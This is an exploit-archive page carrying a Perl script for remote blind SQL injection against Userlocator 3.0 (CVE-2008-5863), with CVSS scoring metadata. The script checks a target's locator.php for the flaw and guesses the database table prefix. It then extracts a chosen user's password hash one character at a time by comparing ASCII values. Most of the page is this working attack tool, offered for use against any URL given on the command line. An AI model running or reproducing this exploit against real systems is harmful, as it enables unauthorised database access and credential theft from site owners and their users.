Exploit: Userlocator 3.0 (y) Remote Blind SQL Injection Exploit ( Ascii Version )

Search:
WLB2

Userlocator 3.0 (y) Remote Blind SQL Injection Exploit

Published
Credit
Risk
2009.01.08
katharsis
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-5863
No
Yes

Plain text version

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

#!/usr/bin/perl -w

use strict;
use LWP::Simple;

$| = 1;
p
print q {

:::::::::::::::::::::::::::::
:: Userlocator 3.0 Exploit ::
:: written by katharsis ::
:::::::::::::::::::::::::::::

[~] www.katharsis.x2.to
[~] nebelfrost23@web.de

};

if (@ARGV < 2) {
print "Usage: usrlocsploit.pl [url] [user id]\nExample: usrlocsploit.pl www.target.com 1\n";
exit;
}

my $page = shift;
my $uid = shift;

my $prefix;

my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');

print "[x] Vulnerability check...\n";

my $chreq = get("http://".$page."/locator.php?action=get_user&y='");

if (($chreq =~ m/Database error/i) || ($chreq =~ m/Invalid SQL/i)) {

print "[x] Seems to be vulnerable!\n";

} else {

print "[o] Seems to be patched, sorry\n";
exit;

}

print "[^] Prefix check...\n";

if ($chreq =~ m/(..._)wlw/i) {

print "[^] Success, using Prefix '$1'\n";
$prefix = $1;

} else {
print "[o] Can't find prefix, using 'bb1_'\n";
$prefix = "bb1";
}

print "[+] Getting hash...\n";
print "[+] Hash: ";

my $curnum = 1;

while($curnum < 32) {

my $false_result =
get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+p
assword+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=-1/*");

foreach(@charset) {

my $ascode = ord($_);
my $result =
get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+p
assword+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=".$ascode."/*
");

if (length($result) != 0) {
if (length($result) != length($false_result)) {
print chr($ascode);
$curnum++;
}
}
}
}

print "\n[+] Done!\n";

# EOF

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version